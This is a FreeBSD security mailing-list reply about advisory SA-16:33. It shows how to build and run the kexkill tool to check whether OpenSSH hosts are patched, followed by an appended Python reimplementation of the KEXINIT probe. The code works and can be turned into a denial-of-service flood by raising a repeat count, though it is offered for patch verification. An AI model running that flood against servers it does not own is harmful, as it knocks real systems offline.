From: Dag-Erling Smørgrav <des@des.no>
To: Xin LI
Cc: Vladimir Terziev, Gregory Orange, freebsd-security@freebsd.org
Subject: Re: FreeBSD Security Advisory FreeBSD-SA-16:33.openssh
Date: Sun, 06 Nov 2016 15:59:38 +0100
In-Reply-To: Xin LI's message of Fri, 4 Nov 2016 10:08:05 -0700
Message-ID: <86vaw0irhh.fsf@desk.des.no>
References: <20161102075533.8BBA114B5@freefall.freebsd.org> <201611021357.uA2DvHMW003088@higson.cam.lispworks.com> <24ff198d-9bd2-9842-50d8-8a1d5e2ecf8a@FreeBSD.org> <79b7122f-3b1a-377f-42bf-bd2851c5e6ae@calorieking.com> <97DEB29F-E625-4A74-9E1A-BC2A220DCF5A@bwinparty.com>

Xin LI writes:
> We will investigate if the statement is true and will issue patches
> for earlier FreeBSD releases, if they are confirmed to be affected.
Hoping to make your life a little easier:

$ git clone https://github.com/dag-erling/kexkill
$ cd kexkill
$ ./autogen.sh && ./configure && make

vulnerable 12.0 system:

$ ./src/kexkill -v -n1 target |& grep -v "sending kexinit"
kexkill: [03] connected
kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310
kexkill: [03] sending banner
kexkill: [03] received kexinit
[no more output]
^C

same system after applying SA-16:33:

$ ./src/kexkill -v -n1 target |& grep -v "sending kexinit"
kexkill: [03] connected
kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310
kexkill: [03] sending banner
kexkill: [03] received kexinit
kexkill: [03] read(): Connection reset by peer
kexkill: [03] connected
kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310
kexkill: [03] sending banner
kexkill: [03] received kexinit
kexkill: [03] write(): Broken pipe
kexkill: [03] connected
kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310
kexkill: [03] sending banner
kexkill: [03] received kexinit
kexkill: [03] read(): Connection reset by peer
[...]
^C

Remove -n1 to actually (attempt to) attack the system rather than just probe it.

DES
-- 
Dag-Erling Smørgrav - des@des.no
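The exchange that kexkill logs above (banner in, banner out, KEXINIT in, repeated KEXINITs out, then either silence or a reset), written out as an added example in Python. This is not kexkill's code and not part of the advisory or the thread: it implements just enough of the RFC 4253 transport layer (identification strings, the unencrypted binary packet framing, a KEXINIT payload) to run the same probe, and it classifies the server's reaction the way the two outputs above differ. The client identification string, all function names, and the fake_sshd stand-in used for offline testing are assumptions of this example; the server banner text inside fake_sshd is copied from the output above. The name-lists in build_kexinit are ordinary algorithm names chosen for the example and are never negotiated.

```python
import os
import socket
import struct
import threading

SSH_MSG_KEXINIT = 20
CLIENT_BANNER = b"SSH-2.0-kexprobe_0.1"  # hypothetical identification string

def ssh_string(data: bytes) -> bytes:
    # RFC 4253 string / name-list: uint32 length followed by the bytes
    return struct.pack(">I", len(data)) + data

def build_kexinit() -> bytes:
    """KEXINIT payload: msg id, 16-byte random cookie, ten name-lists,
    first_kex_packet_follows = FALSE and a reserved uint32 of 0."""
    name_lists = [
        b"curve25519-sha256,diffie-hellman-group14-sha1",  # kex algorithms
        b"ssh-ed25519,ssh-rsa",                             # host key algorithms
        b"aes128-ctr", b"aes128-ctr",                       # ciphers c2s, s2c
        b"hmac-sha2-256", b"hmac-sha2-256",                 # MACs c2s, s2c
        b"none", b"none",                                   # compression c2s, s2c
        b"", b"",                                           # languages c2s, s2c
    ]
    payload = bytes([SSH_MSG_KEXINIT]) + os.urandom(16)
    payload += b"".join(ssh_string(n) for n in name_lists)
    return payload + b"\x00" + struct.pack(">I", 0)

def frame_packet(payload: bytes, block_size: int = 8) -> bytes:
    """Unencrypted binary packet: uint32 packet_length, byte padding_length,
    payload, random padding (>= 4 bytes; whole packet a multiple of block_size)."""
    padlen = block_size - ((5 + len(payload)) % block_size)
    if padlen < 4:
        padlen += block_size
    header = struct.pack(">IB", 1 + len(payload) + padlen, padlen)
    return header + payload + os.urandom(padlen)

def read_exact(sock, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection")
        buf += chunk
    return buf

def read_banner(sock) -> bytes:
    """Skip any pre-banner text lines; return the SSH-2.0-... identification."""
    while True:
        line = b""
        while not line.endswith(b"\n"):
            line += read_exact(sock, 1)
        if line.startswith(b"SSH-"):
            return line.rstrip(b"\r\n")

def read_packet(sock) -> bytes:
    # one unencrypted, unauthenticated binary packet; returns the payload
    packet_len = struct.unpack(">I", read_exact(sock, 4))[0]
    body = read_exact(sock, packet_len)
    return body[1:packet_len - body[0]]

def probe(sock, rounds: int = 1, timeout: float = 2.0) -> str:
    """Banner exchange, read the server's KEXINIT, then send one KEXINIT plus
    `rounds` repeats before any key exchange completes.  'closed' = the server
    dropped the connection (patched host above); 'silent' = it swallowed them
    and kept waiting (unpatched host above); 'replied' = some other message."""
    sock.settimeout(timeout)
    read_banner(sock)
    sock.sendall(CLIENT_BANNER + b"\r\n")
    if read_packet(sock)[:1] != bytes([SSH_MSG_KEXINIT]):
        raise ValueError("server did not open with KEXINIT")
    try:
        for _ in range(rounds + 1):
            sock.sendall(frame_packet(build_kexinit()))
        read_packet(sock)
    except socket.timeout:
        return "silent"
    except ConnectionError:  # connection reset by peer / broken pipe
        return "closed"
    return "replied"

def fake_sshd(sock, patched: bool) -> None:
    """Constructed stand-in for sshd (offline tests only; banner text copied from
    the post): reads client KEXINITs forever (unpatched) or closes on the 2nd."""
    try:
        sock.sendall(b"SSH-2.0-OpenSSH_7.2 FreeBSD-20160310\r\n")
        read_banner(sock)
        sock.sendall(frame_packet(build_kexinit()))
        seen = 0
        while not (patched and seen >= 2):
            read_packet(sock)
            seen += 1
    except OSError:
        pass
    finally:
        sock.close()

def simulate(patched: bool, rounds: int = 1) -> str:
    """Run probe() against fake_sshd over a socketpair; return its verdict."""
    client, server = socket.socketpair()
    worker = threading.Thread(target=fake_sshd, args=(server, patched), daemon=True)
    worker.start()
    try:
        return probe(client, rounds=rounds, timeout=1.0)
    finally:
        client.close()
        worker.join(timeout=2.0)
```

Against a real host, `probe(socket.create_connection((host, 22), timeout=5.0))` does the same exchange; with `rounds=1` it stays a probe in the spirit of `-n1` (one extra KEXINIT is enough to tell the two behaviours apart), while a large `rounds` is the attack and belongs only on systems you own. Note that `simulate(patched=True, rounds=0)` reports `silent`, not `closed`: a single KEXINIT is the legitimate start of key exchange, so the check only fires on the repeat.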